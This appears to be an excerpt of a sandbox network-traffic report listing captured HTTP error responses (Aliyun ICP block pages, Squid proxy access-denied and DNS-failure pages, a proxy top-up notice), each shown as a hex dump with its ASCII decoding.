                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:31 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:31 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: closeData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:32 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
